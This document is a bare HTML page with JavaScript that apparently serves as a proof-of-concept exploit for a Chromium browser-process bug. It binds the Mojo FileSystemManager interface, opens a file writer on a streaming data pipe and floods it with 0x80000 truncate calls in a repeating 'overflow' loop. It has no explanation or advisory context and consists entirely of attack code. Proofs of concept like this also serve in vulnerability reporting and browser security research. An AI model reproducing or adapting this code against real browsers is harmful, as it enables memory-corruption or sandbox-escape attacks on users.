<html>
  <body>
    <script src="/mojo/public/js/mojo_bindings.js"></script>
    <script src="/third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script>
    <script src="/third_party/blink/public/mojom/filesystem/file_system.mojom.js"></script>
    <script>
var writer = null;
var pipe = null;

async function overflow() {
  var promises = []
  var data = new Uint8Array(1);

  for (var i = 0; i != 0x80000; ++i) {
    promises.push(writer.truncate(1));
  }

  pipe.producer.writeData(data);
  await Promise.all(promises);

  window.setTimeout(overflow, 100);
}

async function file_writer() {
  let file_system_manager_ptr = new blink.mojom.FileSystemManagerPtr();
  Mojo.bindInterface(blink.mojom.FileSystemManager.name,
                   mojo.makeRequest(file_system_manager_ptr).handle, "process");

  let host_url = new url.mojom.Url();
  host_url.url = 'http://localhost:7007';

  let open_result = await file_system_manager_ptr.open(host_url, 0);

  let file_url = new url.mojom.Url();
  file_url.url = open_result.rootUrl.url + '/aaaa';

  writer = (await file_system_manager_ptr.createWriter(file_url)).writer;

  pipe = Mojo.createDataPipe({elementNumBytes: 1, capacityNumBytes: 1});
  writer.writeStream(0, pipe.consumer);

  overflow();
}

file_writer();
    </script>
  </body>
</html>
